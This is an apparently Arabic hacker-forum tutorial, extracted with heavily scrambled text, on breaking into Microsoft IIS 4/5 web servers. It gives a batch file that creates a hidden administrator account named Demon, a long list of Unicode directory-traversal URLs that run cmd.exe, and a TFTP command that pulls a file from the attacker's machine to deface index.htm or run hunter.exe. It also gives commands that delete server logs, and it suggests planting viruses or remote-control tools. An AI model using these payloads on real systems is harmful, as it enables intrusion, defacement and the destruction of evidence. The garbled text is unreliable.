ﻗﻌﻬﺎﺘﻮﺘﻲﺗ ﺘﻠ ﻒ (:ﻓﺈن ﻣ ﺤﺎوﻟﺔاﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﺻﻼ ﺣﯿﺎ ت Administratorﻟﯿ ﺲﺑﺎﻟﺴﻬﻮﻟﺔاﻟ ﻓﺎﻟﻮ ﺿﻊ ﻣﺨ
ﺘﻌﺪى ﻋﺪدﻫﺎا ﺻﺎﺑﻊاﻟﯿﺪ ﺘﯿﺎزا تﺑﺸﻜ ﻞ ﻣ ﺤﻠﻲﻓﻲاﻧﻈﻤﺔ ﻣﺎﯾﻜ ﺮوﺳﻮﻓ ﺖ ﻣﻤﻜﻦﻓﻘﻂﺑﻄ ﺮ قﻗﻠﯿﻠﺔ ﻻ ﯾ (:ﻓ ﺮﻓﻊاﻻﻣ
ﺘﺐ ﻫﺬااﻟﻤﻮ ﺿﻮ ع ﻻﺷ ﺮ حﻛﯿﻔﯿﺔا ﺣﻜﺎماﻟﺴﯿﻄ ﺮة ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ واﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﺣﺴﺎب اﻟﻮا ﺣﺪه ..واﻧﺎاﻛ
ﺘﻊﺑﺠﻤﯿﻊ ﻣﻮارداﻟﻨﻈﺎم .. ﺘﻤﻣﻜﺎﻓﻲ ءﻟﻠﻤﺪﯾ ﺮ (:واﻟ
+ﺎﻟﻤﻠﻔﺎ تاﻟﻤﻄﻠﻮﺑﺔ :
Sechole.exeﻮﻣﻠ ﺤﻘﺎﺗﻬﺎ.
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe
١ ٠٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﯿﺎزاﺗﻚ . (:
ﻣﻦ ﺧﻼﻟﻬﺎﺑ ﺮﻓﻊاﻣ
ﺘﻄﯿﻊاﻟﺪ ﺧﻮ لﺑﻬﺬااﻟﯿﻮزر ؟ IWAM_USERﺎﻟﻰاي ﺧﺪﻣﻪ ﻣﺜ ﻞﺗﻠﻨ ﺖاوا فﺗﻲﺑﻲ ؟؟ ﺳﺆا ل :ﻫ ﻞﺗﺴ
ﺘﻜﻮن ﻣﺴﻨﺪهﺑﺸﻜ ﻞ
ﺘﯿﺰاﺗﻪﻟﻜﻨﻨﺎ ﻻ ﻧﻤﻠﻚﻛﻠﻤﻪاﻟﻤ ﺮور !ﻻﻧﻬﺎ ﺳ
ﺎﻻﺟﺎﺑﺔ :ﻻ ..ﺻ ﺤﯿﺢاﻧﻨﺎﻗﻤﻨﺎﺑ ﺮﻓﻊاﻣ
ﻋﺸﻮاﺋﻲ .
١ ٠١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺳﯿﺬﻫﺐﺗﻔﻜﯿ ﺮاﻟﺒﻌ ﺾاﻟﻰ ﺎﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﻣﻠ ﻒاﻟﺴﺎم وﻛﺴ ﺮه (:ﻫﺬا ﻣﻤﻜﻦ ..ﻟﻜﻦ ﯾﻮﺟﺪ ﻣﺎﻫﻮاﺳﻬ ﻞ .
ـ Administratorﻮﻟﻜﻨﻨﺎﻻ ﻧﻤﻠﻚﻛﻠﻤﺔاﻟﻤ ﺮور .ﻣﺎ رأﯾﻚﺑﺈ ﺿﺎﻓﻪ ﯾﻮزر ﺟﺪﯾﺪ ﺑﻤﺎاﻧﻨﺎﻟﺪﯾﻨﺎ ﺣﺴﺎب ﻣﻜﺎﻓﻲﻟ
ﺘﻔﻜﯿ ﺮ (:
ﺘﯿﺎزا تاﻟﻤﺪﯾ ﺮاﯾ ﻀﺎ !! (:ﻗﻠﯿ ﻞ ﻣﻦاﻟﺬﻛﺎ ء ﻮاﻟﺑﺎﺳﻤﻚ ﻣﻊﺑﺎﺳﻮرد ﺧﺎﺻﻪﺑﻚ ﻣﻊاﻣ
ﺘﺎﻟﻲ : ﺘﻨﺪ ﻧﺼﻲ ﺟﺪﯾﺪ وا ﺿ ﻒاﻟﺴﻄ ﺮاﻟ ﻗﻢﺑﺎﻧﺸﺎ ء ﻣﺴ
net user Demon pass /add && net localgroup administrators Demon
/addﻮاﻻن Save asﻮا ﺣﻔﻈﻬﺎﺑﺎﺳﻢadd.bat .
ﺗﻮ ﺿﯿﺢ :ﻣﺎﻓﻌﻠﻨﺎه ﺳﺎﺑﻘﺎ ﻫﻮاﻧﺸﺎ ء ﻣﺠﻠﺪ دﻓﻌﺎﺗﻲ ﯾﻘﻮمﺑﺎﻧﺸﺎ ء ﯾﻮزر ﺟﺪﯾﺪ Demonﻮﻛﻠﻤﺔ ﻣ ﺮور Pass
ﺘﻮرز (:ﺎﻟﻤﺪرا ء ..
ﺘ ﺮﯾ
ﺘﻪاﻟﻰ ﻣﺠﻤﻮﻋﺔاﻻدﻣﻨﺴ ﻮا ﺿﺎﻓ
ﺘﺼﻔﺢ )ﺑﻮاﺳﻄﺔاﻟﯿﻮﻧﻜﻮد( ﻗﻢاﻻنﺑ ﺮﻓﻊاﻟﻤﻠ ﻒ add.batﺛﻢﺗﺸﻐﯿﻠﻬﺎ ﻣﻦاﻟﻤ
ﺘﻄﯿﻊاﻟﺪ ﺧﻮ لاﻟﻰاي ﺧﺪﻣﻪ ..ا فﺗﻲﺑﻲاوﺗﻠﻨ ﺖاو ﻧ ﺖﺑﯿﻮساو ﻏﯿ ﺮﻫﺎ (: ﺎﻻنﻟﺪﯾﻚ ﺣﺴﺎب ﻣﺪﯾ ﺮ (:وﺗﺴ
ﺘﺴﻬﯿ ﻞاﻟﺪ ﺧﻮ لﻓﻲاﻟﻤ ﺮا تاﻟﻘﺎدﻣﻪ (: ﺛﺎر وا ﺿﺎﻓﺔاﻻﺑﻮاباﻟﺨﻠﯿﺔاﻟﺨﺎ ﺻﺔﺑﻚﻟ ﻻﺗﻨﺴﻰﻓﻲاﻟﻨﻬﺎﯾﺔ ﻣﺴﺢاﻻ
ﺘ ﺤﻜﻢﻓﻲ ﻃﺒﻌﺎﻟﻦاﺗﻮﺳﻊﻓﻲﻫﺬااﻟﺠﺎﻧﺐ ﻻﻧﻪ )ﻟﻜ ﻞ ﺷﯿ ﺦ ﻃ ﺮﯾﻘﺔ!( وﻛ ﻞ وا ﺣﺪﻟﻪاﺳﻠﻮبﻓﻲا ﺧﻔﺎ ءادواﺗﻪ واﻟ
اﻟﻤﻠﻔﺎ ت .
١ ٠٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$
ﺘﺮﺑﻼكﻫﻨ:اﻟﻜﺎﺗﺐ
$$$$$$$$$$$
ﺘﻄﻠﺒﺎ ت
ﺘ ﺤﻜﻢﻓﻲاﻟﺴﯿ ﺮﻓ ﺮ ﻋﺒ ﺮاﻟﯿﻮﻧﯿﻜﻮد ﻣﻊﺑﻌ ﺾاﻟﻤ
ﺘﻜﻠﻢ ﻋﻦاﺳﺎﻟﯿﺐاﻟ
اﻟﻤﻮ ﺿﻮ ع ﯾ
: اﻻدوا تاﻟﻤﻄﻠﻮﺑﻪ
(اداة ﻣﺴﺢﺛﻐ ﺮا ت ﯾﻮﻧﯿﻜﻮد١
TFTPD (ﺑ ﺮﻧﺎﻣ ﺞ ﺳﯿ ﺮﻓ ﺮ٢
( ﻣﻌ ﺮﻓﺔ ﺟﯿﺪهﺑﺎﻟﯿﻮﻧﯿﻜﻮد٣
=================================================
ﻗﻌﻲﻗﻊاو ﻣﻦ ﻣﻮ (ﺑﺄﻣﻜﺎﻧﻚاﻟ ﺤﺼﻮ ل ﻋﻠﻰﺛﻐ ﺮا تاﻟﯿﻮﻧﯿﻜﻮد ﻣﻦاﻟﻌﺪﯾﺪ ﻣﻦاﻟﻤﻮا١
(( ﺘ ﺮ
وﻫﺬه ﻣﻬﺪاه ﻣﻨﻲاﻧﺎ ))ﺑﻼك ﻫﻨhttp://www .devil2k.com/
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/
cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+
c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/sy
stem32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c
:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+
c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.ex
e?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/
cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+
dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/
cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/s
ystem32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.
exe?/c+dir+c:\
١ ٠٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/c
md.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../wi
nnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%
35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/
c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm
d.exe?/c+dir+c:\
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe
?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.
exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/c
md.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../wi
nnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%
35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32
/cmd.exe?/c+dir+c:\
/cgi-
bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.
exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32
/cmd.exe?/c+dir+c:\
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32
/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste
m32/cmd.exe?/c+dir+c:\
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.e
xe?/c+dir+c:\
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.e
xe?/c+dir+c:\
١ ٠٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.
exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c
:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di
r+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+
dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system
32/cmd.exe\?/c+dir+c:\
/cgi-
bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd
.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3
2/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syste
m32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3
2/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system3
2/cmd.exe?/c+dir+c:\
١ ٠٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/syste
\m32/cmd.exe?/c+dir+c:
ﻗﻊ http://iisbughelp.4t.com/
(٢ﺑﺄﻣﻜﺎﻧﻚاﻟ ﺤﺼﻮ ل ﻋﻠﻰﺑ ﺮﻧﺎﻣ ﺞ TFTPDﻣﻦاﻟﻤﻮ
١ ٠٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ـﺘﺠﺪﻫﺎﻓﻲ ﻣﺠﻠﺪا تﺑﺪا ﺧ ﻞ ﻣﺠﻠﺪاﻟﻗﻊﺑﺎﺳﻤﻪ ) ﺳ ﺘﺠﺪﻫﺎﻛ ﻞ ﻣﻮﻗﻊﻓﺴ ﺎذاﻛﺎناﻟﺴﯿ ﺮﻓ ﺮ ﯾ ﺤﻮي ﻋﺪة ﻣﻮا
ـ
ﺘﺠﺪﻛﺎﻓﺔاﻟﻤﻠﻔﺎ تﻓﻲ ﻣﺠﻠﺪاﻟ ﻗﻊ وا ﺣﺪﻓﻘﻂﻓﺴ ) wwwrootاﻣﺎﻟﻮﻛﺎناﻟﺴﯿ ﺮﻓ ﺮ ﻋﺒﺎره ﻋﻦ ﻣﻮ
wwwrootﻧﻔﺴﻪ
ﺘﻐﯿﯿ ﺮاﻟﺼﻔ ﺤﺔاﻟ ﺮﺋﯿﺴﯿﻪاﻻوﻟﻰ وﻋﻠﯿﻚانﺗﻌﻠﻢاﻧﻪﻟﯿ ﺲ داﺋﻤﺎاﻟﺼﻔ ﺤﺔاﻟ ﺮﺋﯿﺴﯿﻪ ﻓﻲاﻏﻠﺐاﻟﻈﻦ ﯾﻘﻮماﻟﻬﺎﻛ ﺮﺑ
اﻻوﻟﻰﺗ ﺤﻤ ﻞاﺳﻢ index.htm
ﺘﺼﺎرا تﻟﻬﺎ وﻫﺬهﺑﻌ ﻀﻬﺎ )) ﻣﻌﻈﻤﻬﺎ (( ﻫﻨﺎك ﻋﺪةﺗﺴﻤﯿﺎ ت وأ ﺧ
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp
ﺘ ﺮﻛﯿﺐ ﻧﻈﺎم ﺳﯿ ﺮﻓ ﺮ TFTPﻋﻠﻰ ﺟﻬﺎزك )اﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻤﺬﻛﻮرﻓﻲاو لاﻟﻤﻮ ﺿﻮ ع ﻣﻦاﻓ ﻀ ﻞاﻟﺒ ﺮاﻣ ﺞ اوﻻﻗﻢﺑ
ﺘ ﺮاﻓﺎ وﻟﻜﻦ ﻫﺬا ﯾﻜﻔﻲ (
وﻫﻨﺎكﺑ ﺮﻧﺎﻣ ﺞا ﺧ ﺮاﻛﺜ ﺮا ﺣ
اﻻن ﺿﻊاﻟﺴﯿ ﺮﻓ ﺮاﻟ ﺮﺋﯿﺴﻲﻓﻲ \C:ﻟﺪﯾﻚ
ﺘﺼﻤﯿﻢ ﺻﻔ ﺤﺔ ﺧﻔﯿﻔﻪ وﺳ ﺮﯾﻌﻪ وﺳﻤﻬﺎ index.htmو ﺿﻌﻬﺎﻓﻲ \C: ﻗﻢﺑ
اﻻن ﻧ ﺮﯾﺪان ﻧ ﺮﺳ ﻞﻟﻠﺴﯿ ﺮﻓ ﺮاﻟﻤﻠ ﻒاﻟﺠﺪﯾﺪ ﻣﻦ \C:ﻟﺪﯾﻨﺎاﻟﻰ ﻣﻠ ﻒ C:\inetpub\wwwroot
ﻻﻟﯿ ﺲاﻻﻣ ﺮ ﺻﻌﺒﺎﻓﻔﻲ ﻧﻈﻢ ﻣﯿﻜ ﺮوﺳﻮﻓ ﺖ ﯾﻮﺟﺪاﻣ ﺮ ))ﻫﻮﺑﺎﻷﺻﺢﺑ ﺮﻧﺎﻣﺠﺎ ﻣﻨﻔﺼﻼ (( ﯾ ﺤﻤ ﻞاﺳﻢ TFTP
ﺘﺨﺪم ﺑ ﺮوﺗﻮﻛﻮ ل TFTPوﻫﻮﺑ ﺮوﺗﻮﻛﻮ لﺑﺴﯿﻂ ﺟﺪا ﺟﺪا )) ﯾﺴﻤﯿﻪاﻟﺒﻌ ﺾ وﻫﻮ ﻋﺒﺎره ﻋﻦﻛﻼﯾﻨ ﺖﺑﺴﯿﻂ ﯾﺴ
ﺘﺎﻓﻪ (( ﯾﻘﻮمﺑﺴ ﺤﺐاوارﺳﺎ لاﻟﻤﻠﻔﺎ ت ﻣﻦ واﻟﻰاﻟﺠﻬﺎز وﻧ ﺤﻦ ﻧ ﺮﯾﺪان ﯾﺴ ﺤﺐ ﻣﻠﻔﺎ ﻣﻦ ﺟﻬﺎزﻧﺎ اﻟﺒ ﺮوﺗﻮﻛﻮ لاﻟ
ﻓﻜﯿ ﻒﻟﻨﺎ ذﻟﻚ ؟
ﺘﺎﻟﻲ : ﺘﺒﻨﺎﺗﻮﻟﯿﻔﺔاﻻﻣ ﺮاﻟﻃﺒﻌﺎﻟﻮﻛﻨﺎﻓﻲ ﻏﯿ ﺮاﻟﯿﻮﻧﯿﻜﻮدﻟﻜ
tftp.exe -i XXX.XXX.XXX.XXX get index.htm
C:\inetpub\wwwroot\index.htm
١ ٠٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe
او ﻋﻦ ﻃ ﺮﯾ ﻖ ﻫﺬااﻻﻣ ﺮ
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+
hunter.exe
ﺘﻬﺎ ءﺑﻘﻲﻟﺪﯾﻨﺎﻓﻲاﻟﺴﯿ ﺮﻓ ﺮ ﻋﻤ ﻞ وا ﺣﺪﻓﻘﻂاﻻ وﻫﻮ ﻣﺴﺢ ﻣﻠﻔﺎ تاﻟﻠﻮج *log. ﻗﺪﻗﺎرﺑﻨﺎ ﻋﻠﻰاﻻﻧ اﻵن و
وﺳﯿﻜﻮن ذﻟﻚ ﻋﻦ ﻃ ﺮﯾ ﻖ ﻫﺬااﻻﻣ ﺮ :
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d
el+C:\*.log/s
ﺘﻢﺗﺨﺰﯾﻦﻓﯿﻬﺎﺑﻌ ﺾاﻟﻤﻌﻠﻮﻣﺎ ت وﯾﻔ ﻀ ﻞ ﻣﺴ ﺤﻬﺎاﯾ ﻀﺎ وﻫﻲ ﻣﺜ ﻞاﻟﻤﻠﻔﺎ ت ذا ت ﻫﻨﺎكاﻧﻮا عا ﺧ ﺮى ﻣﻦاﻟﻤﻠﻔﺎ ت ﯾ
ﺘﺪاد tmp اﻻﻣ
وﻫﺬااﻣ ﺮ ﻣﺴ ﺤﻬﺎ ﻋﺒ ﺮاﻟﯿﻮﻧﯿﻜﻮد :
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d
el+C:\*.tmp/s
١ ٠٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
اﯾ ﻀﺎ ﻣﻠ ﺤﻮﻇﻪ ﻣﻬﻤﻪ وﻫﻲان ﻻﺗﺒﻘﻰاي ﻣﻌﻠﻮﻣﺎ ت ﻋﻨﻚﻓﻲاﻟﺴﯿ ﺮﻓ ﺮﻛﻤﺎ ﯾﻔﻌ ﻞاﻟﺒﻌ ﺾﺑﺬﻛ ﺮاﺳﻤﺎﺋﻬﻢاو
ﺘ ﺮا ق )) ﺣﺎو لانﺗﺼ ﻞاﻟﻰ ﻫﺬا
اﯾﻤﯿﻼﺗﻬﻢاﻟ ﺤﻘﯿﻘﯿﻪﻗﻢﺑﻤﺴﺢاي ﺷﻲ ء ﯾﺪ ل ﻋﻠﯿﻚاو ﻋﻠﻰ ﻋﻤﻠﯿﺔاﻻ ﺧ
ﺘﻮى ((اﻟﻤﺴ
ﺘﻤﻜﻦ ﺘﻰﺗ ﻫﻨﺎك ﻋﺪد ﻣﻦاﻻﺷﯿﺎ ء واﻻﻓﻜﺎرﻟﻦاﺗﻄ ﺮ قاﻟﯿﻬﺎ ﻣﺜ ﻞارﺳﺎ لﻓﺎﯾ ﺮوس ﻣﺎاواﻣ ﺮ ﻋﻠﻰ ﻣﻠ ﻒ batﺣ
ﻣﻦ و ﺿﻊ ﻣﺸﻜﻠﻪﻛﺒﯿ ﺮهﻓﻲاﻟﺴﯿ ﺮﻓ ﺮﻟﻜﻲ ﻻ ﯾﻌﻤ ﻞ
اوانﺗ ﺮﺳ ﻞﻓﺎﯾ ﺮوس ﯾﻘﻮمﺑﻤ ﺤﻮ ﺟﻤﯿﻊ ﻣﻠﻔﺎ تاﻟﻨﻈﺎماوانﺗﻤ ﺮز ﻧﻔﺴﻚﻟﺪﯾﻬﻢﻓﻲاﻟﺴﯿ ﺮﻓ ﺮ ﻋﻦ ﻃ ﺮﯾ ﻖﺑ ﺮاﻣ ﺞ
ﺘ ﺤﻜﻢ ﻋﻦﺑﻌﺪ وا ﺧﻔﺎﺋﻬﺎﺑﺸﻜ ﻞ ﺟﯿﺪﻓﻲاﻟﻤﺠﻠﺪا ت ذا تاﻟ ﻤﻠﻔﺎ تاﻟﻜﺜﯿ ﺮ )) ﻣﺜ ﻞ )) system32واﻟﻜﺜﯿ ﺮ اﻟ
اﻟﻜﺜﯿ ﺮ
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
ﻣﻠ ﺤﻮﻇﺎ ت :ﻟﻦﺗﻌﻤ ﻞﻫﺬهاﻟﺜﻐ ﺮهﻓﻲﻛ ﻞاﻟ ﺤﺎﻻ تﻓﻬﻨﺎكﺑﻌ ﺾاﻟﺴﯿ ﺮﻓ ﺮا ت ﯾﻘﻮﻣﻮنﺑﻘﻄﻊاﻟﻄ ﺮﯾ ﻖ ﻋﻠﯿﻚ ﻋﻦ
ﻃ ﺮﯾ ﻖ ﻣﺴﺢ ﻣﻠ ﻒ tftpﻣﻦ ﺳﯿ ﺮﻓ ﺮاﺗﻬﻢ
ﻗﯿﻊ )) ﺘﺮ
)اﻟﻤﻠ ﻒاﻟﻤﺴﺆو ل ﻋﻦ ذﻟﻚ ﻣﻮﺟﻮدﻓﻲاﻟﻤﺠﻠﺪ (system32وﺑﻌ ﺾاﻟﺴﯿ ﺮﻓ ﺮا تﻗﺎﻣ ﺖﺑﻌﻤﻠﯿﺔاﻟ
ﻗﯿﻌﺎﻟﻬﺬهاﻟﺜﻐ ﺮه ((ا ﺻﺪر ت ﻣﯿﻜ ﺮوﺳﻮﻓ ﺖﺗ ﺮ
ﻗﺪ ﯾﻘﻮمﺑﻌﻤ ﻞا ﺻﻄﯿﺎدﻟﻤﺜ ﻞ ﻫﺬه ﻗﺒﺔاﻟﺒﺎﻛﯿ ﺞاﻟﺼﺎدر واﻟﻮارد ووﺑﻌ ﻀﻬﻢﻗﺪ ﯾﻜﻮن وا ﺿﻊﻓﺎﯾ ﺮ وو ل ﯾﻘﻮمﺑﻤ ﺮا
اﻟﻌﻤﻠﯿﺎ ت
ﺘ ﺮﻛﯿﺐﺑ ﺮﻧﺎﻣ ﺞاﻟ ﺤﻤﺎﯾﻪاﻟﻘﻮي ﺟﺪاﻓﻲ ﻧﻈﻢ IISاﻻ وﻫﻮ Secure IISﻣﻦ ﺷ ﺮﻛﺔ وا ﺧ ﺮون ﯾﻘﻮﻣﻮنﺑ
Eeye
ﺘﺎﺑﺔ ﻫﺬااﻟﻤﻮ ﺿﻮ ع ))ﻗﺒ ﻞ ﺣﻮاﻟﻲارﺑﻌﺔاﺷﻬ ﺮ ((ﻛﺎن ﻣﺎ ﯾﻘﺎرب ٩٠ واﻟﻌﺪﯾﺪاﻟﻌﺪﯾﺪ ﻣﻦاﻟﻌﻘﺒﺎ ت وﻟﻜﻦ ﻋﻨﺪﻛ
ﺘﻲﻓﯿﻬﺎ ﻧﻈﺎم IIS %ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮا تاﻟ
ﺘﻬﺎ ((اوﻷﻫﻤﺎ لاﻟﻤﺪﯾ ﺮ.ﻗﻗﯿﻊ ))ﻟﻌﺪم وﺟﻮده و ﺗ ﺤﻮي ﻫﺬهاﻟﺜﻐ ﺮه وﺑﺪونﺗ ﺮ
١ ٠٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$
اﻟﻜﺎﺗﺐDEMON:
$$$$$$$$$$$$
----------
ﻣﻘﺪﻣﺔ - :
---------
ﺘ ﺮﻧ ﺖ ..
ﻗﻊاﻻﻧ ﺘﺨﺪﻣﺔﻓﻲﺗﺸﻐﯿ ﻞ ﻣﻮاﺘﺸﺎر ﺳﯿ ﺮﻓ ﺮا ت IISﺣﯿﺚﺗﺸﻜ ﻞاﻟﻨﺴﺒﺔاﻻﻛﺒ ﺮاﻟﻤﺴ ﯾﻌﻠﻢاﻟﺠﻤﯿﻊ ﻣﺪىاﻧ
ﻮﯾﻌﻠﻢاﻟﺠﻤﯿﻊ ﻣﺪى ﺿﻌ ﻒ ﺎﻟﻨﺎ ﺣﯿﺔاﻻﻣﻨﯿﺔﻟﻬﺬهاﻟﺴﯿ ﺮﻓ ﺮا ت ..ﻟﺬاﻗ ﺮر تاﻟﻘﯿﺎمﺑﺠﻤﻊاﺷﻬ ﺮﺛﻐ ﺮا ت ﻫﺬااﻟﻨﻮ ع
ﻣﻊﺗﻮ ﺿﯿﺢﻛﯿﻔﯿﺔ ﻋﻤﻠﻬﺎ .
---------
ﻣﻼ ﺣﻈﺔ - :
---------
ﺘﻤﺪ ﻋﻠﻰاﻟﺒﻮر ت ((٨٠
ﻣﻌﻈﻢ ﺎﻟﻄ ﺮ قاﻟﻤﻮﺟﻮدة ﻫﻨﺎﺗﻌﻤ ﻞ ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮا ت IIS4.0ﻮ IIS5.0ﻮﺟﻤﯿﻌﻬﺎﺗﻌ
ﺘﺼﻔﺢ(( . ﯾﻌﻨﻲ ﻣﻦ ﺧﻼ لاﻟﻤ
-------------
ﺘﻄﻠﺒﺎ ت - : ﺎﻟﻤ
-------------
ﻗﻊ :
CGI-Scanner -١ﺟﯿﺪ ..أﻧﺎاﻓ ﻀ ﻞ( Whiskerﯾﻤﻜﻨﻚﺗﻨﺰﯾﻠﻪ ﻣﻦ ﻫﺬااﻟﻤﻮ
) www.wiretrip.net/rfp
